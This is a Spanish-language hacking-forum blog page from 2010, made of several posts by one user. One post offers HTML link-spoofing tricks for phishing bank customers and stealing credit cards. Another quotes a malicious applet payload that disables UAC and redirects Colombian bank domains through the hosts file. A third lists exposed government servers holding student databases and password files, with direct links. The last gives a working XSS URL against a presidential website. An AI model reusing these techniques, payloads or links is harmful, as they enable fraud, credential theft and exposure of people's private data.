Publicado el 25/07/2010 12:07:00 en Hacking Web. Total de votos: 1 Votar
Tiempo sin postear D: y despues de hacer absolutamente NADA PRODUCTIVO... =/ e ignoro si esto ya estaba posteado, pues busque y no encontre lo que queria que a final de cuentas es lo que voy a postear :D
pues pasa que mi cachorra PoisonsanX xd se puso tite por que mozilla y asi le detectan su site para futuros cardeos =/
y eso solo pasa cuando alguna "victima" denuncia la pagina =/ blablabla...
no es el punto xd pero me puse a pensar....
alguna funcion para que muestre una URL CONFIABLE ( y que al hacer click siempre no sea esa ) y pense en algo como onmouseover...
pues no sabia si existia algo asi pero lo Googlie :B
taran! alguien ya habia pensado en eso :O
(lose... BIENVENIDO A LA RED... IDIOTA uU) jajaja
pues puse "onmouseover" "windows" "status" blablabla... ;$
y ya me imprimian los resultados ...
AHORA LO BUENO!!!
si yo me pongo a SPAMear :) y quisiera que mis victimas fueran seguras de hacer click si vieran en la barra de estado una url confiable es mucho mas seguro poderlas joder y tener CC's fresh ;$
aqui vamos con el Spoofing para IE
<a href="http://www.bbvvva.cool/login/dates/card.php" onmouseover="window.status='http://www.bbva.com';return true">BBVA</a>
ok, en IE se ve de 10; pero sucede que aunque la mayoria use IE habra quien use Chrome u Mozilla y ellos por defecto han desactivado esa kagada para evitar fraudes... como estos :$
PERO OH VALLA!! TARDE UN POCO PERO ENCONTRE LA MISMA CHINGADERA PERO FUNCIONAL EN MOZILLA Y CHROME :d (y IE para terminar de victorear ajua!!!)
<a href="http://www.disney.com" onclick="window.location='http://www.playboy.com'; return false;">Diviertete vistiendo de Bob a MurdeR uU</a>
taran!! :D cuando pasen el mouse por el link xd veran a www.disney.com cuando entraran a Playboy.com ;$ LOL XD
espero a alguien le sea de utilidad uU
no presumo nada... no encontre esto en concreto en DDLR...
y solo encontre el primero que no funcionaba en Mozilla ni Chrome =/
podra ser sencillo, pero a mi me ha salvado :B
Comentarios: 7 | Leer comentariosPublicado el 21/07/2010 12:07:00 en Hacking Web. Total de votos: 3 Votar
HOY ENTRE A MI CORREO :O AL CUAL NORMALMENTE NUNCA ENTRO (por que es el mail que tenia desde los 8 años T-T sniffffff... haha y que aun uso pero aun asi tiene sus telarañas D:
pues a lo que voy! xD
que me llega un correo de un "periodico" desde un remitente des @microsoft.windowslive.com
Ok! muy creible (para la gente pendeja!)
y le di en mostrar contenido xP
y salia para que vieras un video en flash! claro es una imagen enlazada a un link...
no, no era un .exe
pero como tome mis precauciones hize lo siguiente
en mi querido mozilla firefox teclee lo siguiente antes de pegar la URL:
VIEW-SOURCE:
y la url del mierdero ese era la siguiente!
{no vallan a ser tan idiotas de hacerle click xD)
http://173.236.97.77/~mojondos/JavaApplet/Applet.php
y la muy chingona tenia por codigo fuente lo siguiente :P
<html>
<head>
</head>
<body>
<applet width='1' height='1' code='SunMicrosystems.class' archive='SunMicrosystems.jar'>
<param name='first' value='cmd.exe /c @ECHO OFF & reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f & Reg add "hkey_local_machine\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify /t reg_dword /d 00000001 /f & Reg add "hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 00000000 /f & REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f & echo 127.0.0.1 localhost >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.grupobancolombia.com >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.davivienda.com >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.avvillas.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.bbva.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.colmena.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 grupobancolombia.com >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 davivienda.com >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 avvillas.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 bbva.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 colmena.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & exit'>
</applet>
</body>
</html>Publicado el 16/07/2010 12:07:00 en Off Topic.
una imagen dice mas que mil palabras... :E
HAPPY OWNED!!!
(p.d:solo pedi votito para sacarla a la luz :$ no soy tramposo :E)Comentarios: 0 | Leer comentariosPublicado el 16/07/2010 12:07:00 en Bug Report. Total de votos: 6 Votar
.
e_e joder!!!
es una boludes no capo? ):
si no se encontro alguna cosilla interesante que nos permitiera acceso a dejar algun mensajito, es mas que obvio que no cuentan con un index y libremente puedes ver los directorios, que en si, podrian ser muy sensibles...
que encontre?
(base de datos de alumnos del pais)
BASE DE DATOS DE ALUMNOS DE VARIAS PARTES DEL PAIS
CURPS
FICHEROS .TXT .EXE. .XML ../ muchos ficheros de prueba
UN DIRECTORIO LLAMADO CONFICKER (creo)
y claramente el servidor de la SEP NO CUENTA CON UN ANTIVIRUS! =/
SE ENCONTRO UN FICHERO CON INFORMACION DEL SISTEMA:
http://secundaria1.sep.gob.mx/test.php
por ejemplo un .txt llamado number.txt
que de contenido tenia algo asi
hasta el 155 creo e_e
quien carajo sube esas cosas? :S y no sube almenos un puto index para tapar los directorios?
no pense que con una dork como inurl:"sep.gob.mx" "index of/"
les dejo las 2 url para que entren y vean...
http://secundaria1.sep.gob.mx/
http://secundaria2.sep.gob.mx/
p.d: esto les va a encantar :D
http://secundaria1.sep.gob.mx/Desktop/alumnos_sadok.sql
OR
http://secundaria2.sep.gob.mx/gestion_1/PASS.txt
Publicado el 13/07/2010 12:07:00 en Off Topic.
Bug XSS
Pagina: presidencia.gob.mx
Dork usada: ninguna inurl:"gob.mx" = (accidente/curioseando)
URL del XSS:
[code]http://www.presidencia.gob.mx/index.php?DNA=44&URLR=" onmouseover="alert('xss')"
Tomese en cuenta que es la pagina del presidente de la republica (actualmente felipe calderon)
se busco en toda la pagina bug's, sin exito.... las id= no mostraban vulnerabilidad a iSQL
y los campos de texto filtraba todo caracter especial y si no existia el articulo era redirigido
al index oh a las noticias sobre el paìs, hasta abajo se encontro curiosos links que redireccionaban
a paginas recomendadas por el presidente: cuando una url no era valida mostraba un error en un link <--
al hacer esto el link solo obedecia el error para ser mostrado, ya que era un link puro, se penso que al envenenarlo
obedeceria la inyeccion de forma fiel.... se metio un "onmouseover="alert('xss') para probar, se paso el mouse y ejecuto
la alerta, se probo con iframes y con inyeccion de php pero no tuvo exito, se puede hacer XSS tuneling, "Defaces Temporales"
el problema de este XSS es que esta en una constante redireccion que fue programada para evitar "errores" entonces podria ser
un tanto molesto, pero el BUG existe, Y NO HA SIDO PARCHADO....
y claro, ni me tomo la molestia de reportarlo...
l0ve respondio como podria explotarlo...
CLICK AQUI!
con un poco de maña podria conseguirse la sesion del webmaster, y con un poco de suerte kakearla xP (por decirlo asi xP)
ACTUALIZACION:YA PARCHARON EL 'XSS' SE PUSIERON LISTOS !!!Comentarios: 0 | Leer comentarios
![[x]](http://www.diosdelared.com/images/add.ico)
![[x]](http://ddlr.servepics.com/rd.php?go=http://img231.imageshack.us/img231/4066/dylan1257218199.jpg "dy74h4nd120")
Nick: dy74h4nd120
![[x]](http://www.diosdelared.com/images/tecnico.jpg "Artículo técnico"){kind=small}
uso de Spoofing en barra de estados IE / Mozilla y Chrome